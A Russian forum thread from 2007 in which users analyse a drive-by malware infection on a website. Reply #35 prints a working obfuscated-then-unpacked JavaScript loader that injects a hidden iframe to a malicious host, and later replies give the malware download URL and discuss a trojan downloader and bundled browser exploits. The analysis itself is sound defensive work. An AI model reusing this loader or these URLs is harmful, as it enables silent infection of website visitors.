| Вопрос: Склеиватель *.exe файлов | Добавлено: 02.06.07 03:02 |
Автор вопроса:  Voucik | Web-сайт: vim.extraoffice.ru | ICQ: 237570729 |
| Ответы | Всего ответов: 48 |
|
Номер ответа: 31 Автор ответа:  GSerg Вопросов: 0 Ответов: 1876 
|
Профиль | | #31 | Добавлено: 02.06.07 21:20 |
| ЗЫ. Потом если что, без обид. | ||
|
Номер ответа: 32 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #32 | Добавлено: 02.06.07 21:29 |
|
2GSerg
Невозможно отобразить страницу
Эта страница сейчас недоступна. Возможно, это вызвано техническими проблемами на веб-узле, или требуется изменение параметров обозревателя. Жаль. Не успел. И что бы мне было? Скрипты-то отключены 
|
||
|
Номер ответа: 33 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #33 | Добавлено: 02.06.07 21:32 |
|
А. Нет. Зашел Ща буду смотреть что за шелл там внизу прилеплен
|
||
|
Номер ответа: 34 Автор ответа: MorpheusВопросов: 224 Ответов: 3777 |
Web-сайт: Профиль | | #34 | Добавлено: 02.06.07 21:34 |
| Ниче не понимаю: В ИЕ7 каспер нашёл вредоносный скрипт. А в фаерфоксе ничё нету. Но я проследил и нашёл ссылку на пхп файл с варезника. это он виноват? И какие от него эффекты на фаерфокс? | ||
|
Номер ответа: 35 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #35 | Добавлено: 02.06.07 21:48 |
|
Ну дошел гдето до:
<html><body><input type="text" id="i"><script>/* s1f1l1z */function dS(BT,dq){ var WR=new Date();var yv= new Date(); yv.setTime(WR.getTime()+86400000); document.cookie = BT+"="+escape(dq)+";expires="+yv.toGMTString(); }var xk='s1f1l1z',pg='1';var uZ='s1.rollsystems.info',Uh='/html/';if(document.cookie.indexOf(xk+'='+pg)==-1){ var uI='http://'+(document.location.host != ''?'':AV())+document.location.host.replace(/[^a-z0-9.-]/,'.').replace(/\.+/,'.')+'.'+AV()+'.'+uZ+Uh;var Cz=document.createElement('iframe');Cz.setAttribute('src',uI);Cz.frameBorder=0; Cz.width=3;Cz.height=0;try { document.body.appendChild(Cz);dS(xk,pg); }catch(e){ document.write('<html><body></body></html>');document.body.appendChild(Cz); dS(xk,pg); } }function AV(){ var is=24,fD="01234567890abcdef";var Xb=""; for(Ud=0; Ud < is; Ud++) Xb+= fD.substr(Math.floor(Math.random()*fD.length),1,1); return Xb; }</script>
Где бы мне такой обфускатор достать? Этот код был 2 раза запакован. |
||
|
Номер ответа: 36 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #36 | Добавлено: 02.06.07 22:04 |
|
Блин. На "Строймонтаж" только загрузчик был. Я его парсил и вот ссыль получил. Вот тут надо покопаться
(!!!) Тут вирус http://s1.rollsystems.info/html/ |
||
|
Номер ответа: 37 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #37 | Добавлено: 02.06.07 22:18 |
|
Нашел я финальный эксплоит. Закачивает какой-то екзешник
Этот s1f1l1z, как минимум в яваскрипте разбирается
|
||
|
Номер ответа: 38 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #38 | Добавлено: 02.06.07 22:22 |
|
А вот и сам вирь. http://s1.rollsystems.(если уверен что хочешь вирь скачать замени это на info)/o0o/exp/file.php
|
||
|
Номер ответа: 39 Автор ответа: MorpheusВопросов: 224 Ответов: 3777 |
Web-сайт: Профиль | | #39 | Добавлено: 02.06.07 23:22 |
| ага , опять в ИЕ каспер блокирует. А даже без него, можно просто отказаться от экзешки. А чё это за файл? 5,875 байт? стоит его ксаперу отправлять а то он его не ловит? | ||
|
Номер ответа: 40 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #40 | Добавлено: 02.06.07 23:34 |
|
Стоит отправить. Наверняка это не поздравительная открытка.
А ссыль указаный мной выше - это то что теоретически будет исполнено если на сайт "Строймонтаж" зайти. |
||
|
Номер ответа: 41 Автор ответа: MorpheusВопросов: 224 Ответов: 3777 |
Web-сайт: Профиль | | #41 | Добавлено: 03.06.07 00:38 |
|
Ха! Действительно стоило.
Здравствуйте, file.exe_ - Trojan-Downloader.Win32.Small.epy Детектирование файла будет добавлено в следующее обновление. Пожалуйста, при ответе включайте переписку целиком. -- С уважением, *********** Вирусный аналитик Лаборатории Касперского. |
||
|
Номер ответа: 42 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #42 | Добавлено: 03.06.07 00:46 |
|
GSerg
Без проблемм зайду, ибо браузер Opera. Большинство сплойтов рассчитывается на IE, ибо он доминирующий вид на паросторах сети... ZagZag Подобные трюки с попытками обфускации ява скрипртов обычная практика, привыкай. Реже встречаются сплойты на vb script. |
||
|
Номер ответа: 43 Автор ответа: GSergВопросов: 0 Ответов: 1876
|
Профиль | | #43 | Добавлено: 03.06.07 09:35 |
|
Без проблемм зайду, ибо браузер Opera. Большинство сплойтов рассчитывается на IE, ибо он доминирующий вид на паросторах сети...
Если тамошний самый финальный код распаковать целиком, получится нехилая страничка, на которой собраны функции-эксплойты всех видов, до каких только автор мог дотянуться. Даже переполнение буфера в Мозилле. Ни один эксплойт непосредственно с IE не связан. Наверняка это не поздравительная открытка
Она там оч. давно, причём каждый раз разная. По причине этого Касперский не ловит. А троянчик, LdPinch, он умный, он нажимает кнопку "Разрешить" во всех предупреждениях всех антивирусов и файрволах. опять в ИЕ каспер блокирует
Читер. Я спрециально это предложил тем, кто тут хвастался, что у него антивирус отключен, ибо это для чайников. |
||
|
Номер ответа: 44 Автор ответа: sneРазработчик Offline Client ICQ: 233286456 Вопросов: 34 Ответов: 5445 |
Web-сайт: Профиль | | #44 | Добавлено: 03.06.07 11:06 |
| попозже распакую потестю и на опере и на прочих браузерах эти сплойты... | ||
|
Номер ответа: 45 Автор ответа: ZagZagICQ: 295002202 Вопросов: 87 Ответов: 1684 |
Профиль | | #45 | Добавлено: 03.06.07 14:57 |
|
Подобные трюки с попытками обфускации ява скрипртов обычная практика, привыкай.
Реже встречаются сплойты на vb script. Сомневаюсь что его вручную так запаковывали. Скоре какая-то прога для этого есть. Интересует ее название. |
||